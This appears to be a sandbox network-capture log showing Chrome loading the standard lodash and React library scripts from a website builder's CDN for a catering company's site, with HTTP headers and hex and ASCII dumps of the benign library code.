                                                                                                                                                                                                                        15192.168.2.54973334.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC563OUTGET /unpkg/lodash@4.17.21/lodash.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1043INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 73015
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 318693818
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVcxMNgXS7J8yrt3GwAgEfDyVn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Sun, 15 Dec 2024 17:58:31 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 2231646
                                                                                                                                                                                                                        Last-Modified: Sat, 29 Jun 2024 02:50:49 GMT
                                                                                                                                                                                                                        ETag: "9becc40fb1d85d21d0ca38e2f7069511"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-991dec68
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC347INData Raw: 2f 2a 2a 0a 20 2a 20 40 6c 69 63 65 6e 73 65 0a 20 2a 20 4c 6f 64 61 73 68 20 3c 68 74 74 70 73 3a 2f 2f 6c 6f 64 61 73 68 2e 63 6f 6d 2f 3e 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 3c 68 74 74 70 73 3a 2f 2f 6f 70 65 6e 6a 73 66 2e 6f 72 67 2f 3e 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 6c 69 63 65 6e 73 65 20 3c 68 74 74 70 73 3a 2f 2f 6c 6f 64 61 73 68 2e 63 6f 6d 2f 6c 69 63 65 6e 73 65 3e 0a 20 2a 20 42 61 73 65 64 20 6f 6e 20 55 6e 64 65 72 73 63 6f 72 65 2e 6a 73 20 31 2e 38 2e 33 20 3c 68 74 74 70 3a 2f 2f 75 6e 64 65 72 73 63 6f 72 65 6a 73 2e 6f 72 67 2f 4c 49 43 45 4e 53 45 3e 0a 20 2a 20 43 6f
                                                                                                                                                                                                                        Data Ascii: /** * @license * Lodash <https://lodash.com/> * Copyright OpenJS Foundation and other contributors <https://openjsf.org/> * Released under MIT license <https://lodash.com/license> * Based on Underscore.js 1.8.3 <http://underscorejs.org/LICENSE> * Co
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1390INData Raw: 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 6e 2c 74 2c 72 29 7b 73 77 69 74 63 68 28 72 2e 6c 65 6e 67 74 68 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 6e 2e 63 61 6c 6c 28 74 29 3b 63 61 73 65 20 31 3a 72 65 74 75 72 6e 20 6e 2e 63 61 6c 6c 28 74 2c 72 5b 30 5d 29 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 20 6e 2e 63 61 6c 6c 28 74 2c 72 5b 30 5d 2c 72 5b 31 5d 29 3b 63 61 73 65 20 33 3a 72 65 74 75 72 6e 20 6e 2e 63 61 6c 6c 28 74 2c 72 5b 30 5d 2c 72 5b 31 5d 2c 72 5b 32 5d 29 7d 72 65 74 75 72 6e 20 6e 2e 61 70 70 6c 79 28 74 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 74 28 6e 2c 74 2c 72 2c 65 29 7b 66 6f 72 28 76 61 72 20 75 3d 2d 31 2c 69 3d 6e 75 6c 6c 3d 3d 6e 3f 30 3a 6e 2e 6c 65 6e 67 74 68 3b 2b 2b 75 3c 69 3b 29 7b 76 61 72 20 6f 3d 6e 5b 75 5d 3b
                                                                                                                                                                                                                        Data Ascii: {function n(n,t,r){switch(r.length){case 0:return n.call(t);case 1:return n.call(t,r[0]);case 2:return n.call(t,r[0],r[1]);case 3:return n.call(t,r[0],r[1],r[2])}return n.apply(t,r)}function t(n,t,r,e){for(var u=-1,i=null==n?0:n.length;++u<i;){var o=n[u];
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1390INData Raw: 6e 20 65 3d 72 2c 21 31 7d 29 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 67 28 6e 2c 74 2c 72 2c 65 29 7b 66 6f 72 28 76 61 72 20 75 3d 6e 2e 6c 65 6e 67 74 68 2c 69 3d 72 2b 28 65 3f 31 3a 2d 31 29 3b 65 3f 69 2d 2d 3a 2b 2b 69 3c 75 3b 29 69 66 28 74 28 6e 5b 69 5d 2c 69 2c 6e 29 29 72 65 74 75 72 6e 20 69 3b 72 65 74 75 72 6e 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 79 28 6e 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 74 3d 3d 3d 74 3f 5a 28 6e 2c 74 2c 72 29 3a 67 28 6e 2c 62 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 6e 2c 74 2c 72 2c 65 29 7b 0a 66 6f 72 28 76 61 72 20 75 3d 72 2d 31 2c 69 3d 6e 2e 6c 65 6e 67 74 68 3b 2b 2b 75 3c 69 3b 29 69 66 28 65 28 6e 5b 75 5d 2c 74 29 29 72 65 74 75 72 6e 20 75 3b 72 65 74 75 72 6e 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 62 28
                                                                                                                                                                                                                        Data Ascii: n e=r,!1}),e}function g(n,t,r,e){for(var u=n.length,i=r+(e?1:-1);e?i--:++i<u;)if(t(n[i],i,n))return i;return-1}function y(n,t,r){return t===t?Z(n,t,r):g(n,b,r)}function d(n,t,r,e){for(var u=r-1,i=n.length;++u<i;)if(e(n[u],t))return u;return-1}function b(
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1390INData Raw: 6f 6e 65 3b 29 72 2e 70 75 73 68 28 74 2e 76 61 6c 75 65 29 3b 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 4d 28 6e 29 7b 76 61 72 20 74 3d 2d 31 2c 72 3d 41 72 72 61 79 28 6e 2e 73 69 7a 65 29 3b 72 65 74 75 72 6e 20 6e 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 29 7b 72 5b 2b 2b 74 5d 3d 5b 65 2c 6e 5d 7d 29 2c 72 7d 66 75 6e 63 74 69 6f 6e 20 46 28 6e 2c 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 6e 28 74 28 72 29 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 6e 2c 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 2d 31 2c 65 3d 6e 2e 6c 65 6e 67 74 68 2c 75 3d 30 2c 69 3d 5b 5d 3b 2b 2b 72 3c 65 3b 29 7b 76 61 72 20 6f 3d 6e 5b 72 5d 3b 6f 21 3d 3d 74 26 26 6f 21 3d 3d 63 6e 7c 7c 28 6e 5b 72
                                                                                                                                                                                                                        Data Ascii: one;)r.push(t.value);return r}function M(n){var t=-1,r=Array(n.size);return n.forEach(function(n,e){r[++t]=[e,n]}),r}function F(n,t){return function(r){return n(t(r))}}function N(n,t){for(var r=-1,e=n.length,u=0,i=[];++r<e;){var o=n[r];o!==t&&o!==cn||(n[r
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1390INData Raw: 5d 2c 5b 22 63 75 72 72 79 52 69 67 68 74 22 2c 64 6e 5d 2c 5b 22 66 6c 69 70 22 2c 6a 6e 5d 2c 5b 22 70 61 72 74 69 61 6c 22 2c 62 6e 5d 2c 5b 22 70 61 72 74 69 61 6c 52 69 67 68 74 22 2c 77 6e 5d 2c 5b 22 72 65 61 72 67 22 2c 78 6e 5d 5d 2c 44 6e 3d 22 5b 6f 62 6a 65 63 74 20 41 72 67 75 6d 65 6e 74 73 5d 22 2c 4d 6e 3d 22 5b 6f 62 6a 65 63 74 20 41 72 72 61 79 5d 22 2c 46 6e 3d 22 5b 6f 62 6a 65 63 74 20 41 73 79 6e 63 46 75 6e 63 74 69 6f 6e 5d 22 2c 4e 6e 3d 22 5b 6f 62 6a 65 63 74 20 42 6f 6f 6c 65 61 6e 5d 22 2c 50 6e 3d 22 5b 6f 62 6a 65 63 74 20 44 61 74 65 5d 22 2c 71 6e 3d 22 5b 6f 62 6a 65 63 74 20 44 4f 4d 45 78 63 65 70 74 69 6f 6e 5d 22 2c 5a 6e 3d 22 5b 6f 62 6a 65 63 74 20 45 72 72 6f 72 5d 22 2c 4b 6e 3d 22 5b 6f 62 6a 65 63 74 20 46 75
                                                                                                                                                                                                                        Data Ascii: ],["curryRight",dn],["flip",jn],["partial",bn],["partialRight",wn],["rearg",xn]],Dn="[object Arguments]",Mn="[object Array]",Fn="[object AsyncFunction]",Nn="[object Boolean]",Pn="[object Date]",qn="[object DOMException]",Zn="[object Error]",Kn="[object Fu
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1390INData Raw: 2e 2b 29 5c 5d 20 5c 2a 2f 2c 54 74 3d 2f 2c 3f 20 26 20 2f 2c 24 74 3d 2f 5b 5e 5c 78 30 30 2d 5c 78 32 66 5c 78 33 61 2d 5c 78 34 30 5c 78 35 62 2d 5c 78 36 30 5c 78 37 62 2d 5c 78 37 66 5d 2b 2f 67 2c 44 74 3d 2f 5b 28 29 3d 2c 7b 7d 5c 5b 5c 5d 5c 2f 5c 73 5d 2f 2c 4d 74 3d 2f 5c 5c 28 5c 5c 29 3f 2f 67 2c 46 74 3d 2f 5c 24 5c 7b 28 5b 5e 5c 5c 7d 5d 2a 28 3f 3a 5c 5c 2e 5b 5e 5c 5c 7d 5d 2a 29 2a 29 5c 7d 2f 67 2c 4e 74 3d 2f 5c 77 2a 24 2f 2c 50 74 3d 2f 5e 5b 2d 2b 5d 30 78 5b 30 2d 39 61 2d 66 5d 2b 24 2f 69 2c 71 74 3d 2f 5e 30 62 5b 30 31 5d 2b 24 2f 69 2c 5a 74 3d 2f 5e 5c 5b 6f 62 6a 65 63 74 20 2e 2b 3f 43 6f 6e 73 74 72 75 63 74 6f 72 5c 5d 24 2f 2c 4b 74 3d 2f 5e 30 6f 5b 30 2d 37 5d 2b 24 2f 69 2c 56 74 3d 2f 5e 28 3f 3a 30 7c 5b 31 2d 39
                                                                                                                                                                                                                        Data Ascii: .+)\] \*/,Tt=/,? & /,$t=/[^\x00-\x2f\x3a-\x40\x5b-\x60\x7b-\x7f]+/g,Dt=/[()=,{}\[\]\/\s]/,Mt=/\\(\\)?/g,Ft=/\$\{([^\\}]*(?:\\.[^\\}]*)*)\}/g,Nt=/\w*$/,Pt=/^[-+]0x[0-9a-f]+$/i,qt=/^0b[01]+$/i,Zt=/^\[object .+?Constructor\]$/,Kt=/^0o[0-7]+$/i,Vt=/^(?:0|[1-9
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1390INData Raw: 44 7c 33 52 44 7c 28 3f 21 5b 31 32 33 5d 29 5c 5c 64 54 48 29 28 3f 3d 5c 5c 62 7c 5b 61 2d 7a 5f 5d 29 22 2c 55 72 3d 53 72 2b 45 72 2b 57 72 2c 42 72 3d 22 28 3f 3a 22 2b 5b 67 72 2c 78 72 2c 6a 72 5d 2e 6a 6f 69 6e 28 22 7c 22 29 2b 22 29 22 2b 55 72 2c 54 72 3d 22 28 3f 3a 22 2b 5b 6d 72 2b 5f 72 2b 22 3f 22 2c 5f 72 2c 78 72 2c 6a 72 2c 68 72 5d 2e 6a 6f 69 6e 28 22 7c 22 29 2b 22 29 22 2c 24 72 3d 52 65 67 45 78 70 28 73 72 2c 22 67 22 29 2c 44 72 3d 52 65 67 45 78 70 28 5f 72 2c 22 67 22 29 2c 4d 72 3d 52 65 67 45 78 70 28 62 72 2b 22 28 3f 3d 22 2b 62 72 2b 22 29 7c 22 2b 54 72 2b 55 72 2c 22 67 22 29 2c 46 72 3d 52 65 67 45 78 70 28 5b 41 72 2b 22 3f 22 2b 79 72 2b 22 2b 22 2b 52 72 2b 22 28 3f 3d 22 2b 5b 70 72 2c 41 72 2c 22 24 22 5d 2e 6a 6f
                                                                                                                                                                                                                        Data Ascii: D|3RD|(?![123])\\dTH)(?=\\b|[a-z_])",Ur=Sr+Er+Wr,Br="(?:"+[gr,xr,jr].join("|")+")"+Ur,Tr="(?:"+[mr+_r+"?",_r,xr,jr,hr].join("|")+")",$r=RegExp(sr,"g"),Dr=RegExp(_r,"g"),Mr=RegExp(br+"(?="+br+")|"+Tr+Ur,"g"),Fr=RegExp([Ar+"?"+yr+"+"+Rr+"(?="+[pr,Ar,"$"].jo
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1390INData Raw: 3a 22 45 22 2c 22 5c 78 63 62 22 3a 22 45 22 2c 22 5c 78 65 38 22 3a 22 65 22 2c 22 5c 78 65 39 22 3a 22 65 22 2c 22 5c 78 65 61 22 3a 22 65 22 2c 22 5c 78 65 62 22 3a 22 65 22 2c 22 5c 78 63 63 22 3a 22 49 22 2c 22 5c 78 63 64 22 3a 22 49 22 2c 22 5c 78 63 65 22 3a 22 49 22 2c 22 5c 78 63 66 22 3a 22 49 22 2c 22 5c 78 65 63 22 3a 22 69 22 2c 22 5c 78 65 64 22 3a 22 69 22 2c 22 5c 78 65 65 22 3a 22 69 22 2c 22 5c 78 65 66 22 3a 22 69 22 2c 22 5c 78 64 31 22 3a 22 4e 22 2c 22 5c 78 66 31 22 3a 22 6e 22 2c 22 5c 78 64 32 22 3a 22 4f 22 2c 22 5c 78 64 33 22 3a 22 4f 22 2c 22 5c 78 64 34 22 3a 22 4f 22 2c 22 5c 78 64 35 22 3a 22 4f 22 2c 22 5c 78 64 36 22 3a 22 4f 22 2c 22 5c 78 64 38 22 3a 22 4f 22 2c 22 5c 78 66 32 22 3a 22 6f 22 2c 22 5c 78 66 33 22 3a 22
                                                                                                                                                                                                                        Data Ascii: :"E","\xcb":"E","\xe8":"e","\xe9":"e","\xea":"e","\xeb":"e","\xcc":"I","\xcd":"I","\xce":"I","\xcf":"I","\xec":"i","\xed":"i","\xee":"i","\xef":"i","\xd1":"N","\xf1":"n","\xd2":"O","\xd3":"O","\xd4":"O","\xd5":"O","\xd6":"O","\xd8":"O","\xf2":"o","\xf3":"
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1390INData Raw: 3a 22 6e 22 2c 22 5c 75 30 31 34 36 22 3a 22 6e 22 2c 22 5c 75 30 31 34 38 22 3a 22 6e 22 2c 22 5c 75 30 31 34 62 22 3a 22 6e 22 2c 22 5c 75 30 31 34 63 22 3a 22 4f 22 2c 0a 22 5c 75 30 31 34 65 22 3a 22 4f 22 2c 22 5c 75 30 31 35 30 22 3a 22 4f 22 2c 22 5c 75 30 31 34 64 22 3a 22 6f 22 2c 22 5c 75 30 31 34 66 22 3a 22 6f 22 2c 22 5c 75 30 31 35 31 22 3a 22 6f 22 2c 22 5c 75 30 31 35 34 22 3a 22 52 22 2c 22 5c 75 30 31 35 36 22 3a 22 52 22 2c 22 5c 75 30 31 35 38 22 3a 22 52 22 2c 22 5c 75 30 31 35 35 22 3a 22 72 22 2c 22 5c 75 30 31 35 37 22 3a 22 72 22 2c 22 5c 75 30 31 35 39 22 3a 22 72 22 2c 22 5c 75 30 31 35 61 22 3a 22 53 22 2c 22 5c 75 30 31 35 63 22 3a 22 53 22 2c 22 5c 75 30 31 35 65 22 3a 22 53 22 2c 22 5c 75 30 31 36 30 22 3a 22 53 22 2c 22 5c
                                                                                                                                                                                                                        Data Ascii: :"n","\u0146":"n","\u0148":"n","\u014b":"n","\u014c":"O","\u014e":"O","\u0150":"O","\u014d":"o","\u014f":"o","\u0151":"o","\u0154":"R","\u0156":"R","\u0158":"R","\u0155":"r","\u0157":"r","\u0159":"r","\u015a":"S","\u015c":"S","\u015e":"S","\u0160":"S","\
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1390INData Raw: 74 79 70 65 73 3b 72 65 74 75 72 6e 20 6e 3f 6e 3a 6f 65 26 26 6f 65 2e 62 69 6e 64 69 6e 67 26 26 6f 65 2e 62 69 6e 64 69 6e 67 28 22 75 74 69 6c 22 29 7d 63 61 74 63 68 28 6e 29 7b 7d 7d 28 29 2c 63 65 3d 66 65 26 26 66 65 2e 69 73 41 72 72 61 79 42 75 66 66 65 72 2c 61 65 3d 66 65 26 26 66 65 2e 69 73 44 61 74 65 2c 6c 65 3d 66 65 26 26 66 65 2e 69 73 4d 61 70 2c 73 65 3d 66 65 26 26 66 65 2e 69 73 52 65 67 45 78 70 2c 68 65 3d 66 65 26 26 66 65 2e 69 73 53 65 74 2c 70 65 3d 66 65 26 26 66 65 2e 69 73 54 79 70 65 64 41 72 72 61 79 2c 5f 65 3d 6d 28 22 6c 65 6e 67 74 68 22 29 2c 76 65 3d 78 28 47 72 29 2c 67 65 3d 78 28 48 72 29 2c 79 65 3d 78 28 4a 72 29 2c 64 65 3d 66 75 6e 63 74 69 6f 6e 20 70 28 78 29 7b 66 75 6e 63 74 69 6f 6e 20 5a 28 6e 29 7b 69
                                                                                                                                                                                                                        Data Ascii: types;return n?n:oe&&oe.binding&&oe.binding("util")}catch(n){}}(),ce=fe&&fe.isArrayBuffer,ae=fe&&fe.isDate,le=fe&&fe.isMap,se=fe&&fe.isRegExp,he=fe&&fe.isSet,pe=fe&&fe.isTypedArray,_e=m("length"),ve=x(Gr),ge=x(Hr),ye=x(Jr),de=function p(x){function Z(n){i


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        16192.168.2.54973534.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC613OUTGET /unpkg/react@18.3.1/umd/react.production.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1042INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        Content-Length: 10751
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Varnish: 402392653
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVcxMNgXS7J8yrt3GwAgEfDyVn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Tue, 31 Dec 2024 22:10:48 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 834109
                                                                                                                                                                                                                        Last-Modified: Sat, 27 Apr 2024 07:22:22 GMT
                                                                                                                                                                                                                        ETag: "e91b2616629791b375867c298dc846cc"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-991dec68
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC348INData Raw: 2f 2a 2a 0a 20 2a 20 40 6c 69 63 65 6e 73 65 20 52 65 61 63 74 0a 20 2a 20 72 65 61 63 74 2e 70 72 6f 64 75 63 74 69 6f 6e 2e 6d 69 6e 2e 6a 73 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 61 6e 64 20 69 74 73 20 61 66 66 69 6c 69 61 74 65 73 2e 0a 20 2a 0a 20 2a 20 54 68 69 73 20 73 6f 75 72 63 65 20 63 6f 64 65 20 69 73 20 6c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 20 66 6f 75 6e 64 20 69 6e 20 74 68 65 0a 20 2a 20 4c 49 43 45 4e 53 45 20 66 69 6c 65 20 69 6e 20 74 68 65 20 72 6f 6f 74 20 64 69 72 65 63 74 6f 72 79 20 6f 66 20 74 68 69 73 20 73 6f 75 72 63 65 20 74 72 65 65 2e 0a 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 27 75 73 65 20 73
                                                                                                                                                                                                                        Data Ascii: /** * @license React * react.production.min.js * * Copyright (c) Facebook, Inc. and its affiliates. * * This source code is licensed under the MIT license found in the * LICENSE file in the root directory of this source tree. */(function(){'use s
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1390INData Raw: 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 65 78 70 6f 72 74 73 22 5d 2c 78 29 3a 28 63 3d 63 7c 7c 73 65 6c 66 2c 78 28 63 2e 52 65 61 63 74 3d 7b 7d 29 29 7d 29 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 63 29 7b 66 75 6e 63 74 69 6f 6e 20 78 28 61 29 7b 69 66 28 6e 75 6c 6c 3d 3d 3d 61 7c 7c 22 6f 62 6a 65 63 74 22 21 3d 3d 74 79 70 65 6f 66 20 61 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 61 3d 56 26 26 61 5b 56 5d 7c 7c 61 5b 22 40 40 69 74 65 72 61 74 6f 72 22 5d 3b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 61 3f 61 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 77 28 61 2c 62 2c 65 29 7b 74 68 69 73 2e 70 72 6f 70 73 3d 61 3b 74 68
                                                                                                                                                                                                                        Data Ascii: tion"===typeof define&&define.amd?define(["exports"],x):(c=c||self,x(c.React={}))})(this,function(c){function x(a){if(null===a||"object"!==typeof a)return null;a=V&&a[V]||a["@@iterator"];return"function"===typeof a?a:null}function w(a,b,e){this.props=a;th
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1390INData Raw: 75 72 6e 20 68 3d 61 2c 64 3d 64 28 68 29 2c 61 3d 22 22 3d 3d 3d 6d 3f 22 2e 22 2b 0a 4e 28 68 2c 30 29 3a 6d 2c 63 61 28 64 29 3f 28 65 3d 22 22 2c 6e 75 6c 6c 21 3d 61 26 26 28 65 3d 61 2e 72 65 70 6c 61 63 65 28 64 61 2c 22 24 26 2f 22 29 2b 22 2f 22 29 2c 42 28 64 2c 62 2c 65 2c 22 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7d 29 29 3a 6e 75 6c 6c 21 3d 64 26 26 28 4d 28 64 29 26 26 28 64 3d 6f 61 28 64 2c 65 2b 28 21 64 2e 6b 65 79 7c 7c 68 26 26 68 2e 6b 65 79 3d 3d 3d 64 2e 6b 65 79 3f 22 22 3a 28 22 22 2b 64 2e 6b 65 79 29 2e 72 65 70 6c 61 63 65 28 64 61 2c 22 24 26 2f 22 29 2b 22 2f 22 29 2b 61 29 29 2c 62 2e 70 75 73 68 28 64 29 29 2c 31 3b 68 3d 30 3b 6d 3d 22 22 3d 3d 3d 6d 3f 22 2e 22 3a 6d 2b 22 3a 22 3b 69 66 28 63
                                                                                                                                                                                                                        Data Ascii: urn h=a,d=d(h),a=""===m?"."+N(h,0):m,ca(d)?(e="",null!=a&&(e=a.replace(da,"$&/")+"/"),B(d,b,e,"",function(a){return a})):null!=d&&(M(d)&&(d=oa(d,e+(!d.key||h&&h.key===d.key?"":(""+d.key).replace(da,"$&/")+"/")+a)),b.push(d)),1;h=0;m=""===m?".":m+":";if(c
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1390INData Raw: 31 3b 63 3c 6b 3b 29 7b 76 61 72 20 68 3d 32 2a 28 63 2b 31 29 2d 31 2c 6c 3d 61 5b 68 5d 2c 66 3d 68 2b 31 2c 67 3d 61 5b 66 5d 3b 69 66 28 30 3e 44 28 6c 2c 65 29 29 66 3c 64 26 26 30 3e 44 28 67 2c 6c 29 3f 28 61 5b 63 5d 3d 67 2c 61 5b 66 5d 3d 65 2c 63 3d 66 29 3a 28 61 5b 63 5d 3d 6c 2c 61 5b 68 5d 3d 65 2c 63 3d 68 29 3b 65 6c 73 65 20 69 66 28 66 3c 64 26 26 30 3e 44 28 67 2c 65 29 29 61 5b 63 5d 3d 67 2c 61 5b 66 5d 3d 65 2c 63 3d 66 3b 65 6c 73 65 20 62 72 65 61 6b 20 61 7d 7d 72 65 74 75 72 6e 20 62 7d 0a 66 75 6e 63 74 69 6f 6e 20 44 28 61 2c 62 29 7b 76 61 72 20 63 3d 61 2e 73 6f 72 74 49 6e 64 65 78 2d 62 2e 73 6f 72 74 49 6e 64 65 78 3b 72 65 74 75 72 6e 20 30 21 3d 3d 63 3f 63 3a 61 2e 69 64 2d 62 2e 69 64 7d 66 75 6e 63 74 69 6f 6e 20 50
                                                                                                                                                                                                                        Data Ascii: 1;c<k;){var h=2*(c+1)-1,l=a[h],f=h+1,g=a[f];if(0>D(l,e))f<d&&0>D(g,l)?(a[c]=g,a[f]=e,c=f):(a[c]=l,a[h]=e,c=h);else if(f<d&&0>D(g,e))a[c]=g,a[f]=e,c=f;else break a}}return b}function D(a,b){var c=a.sortIndex-b.sortIndex;return 0!==c?c:a.id-b.id}function P
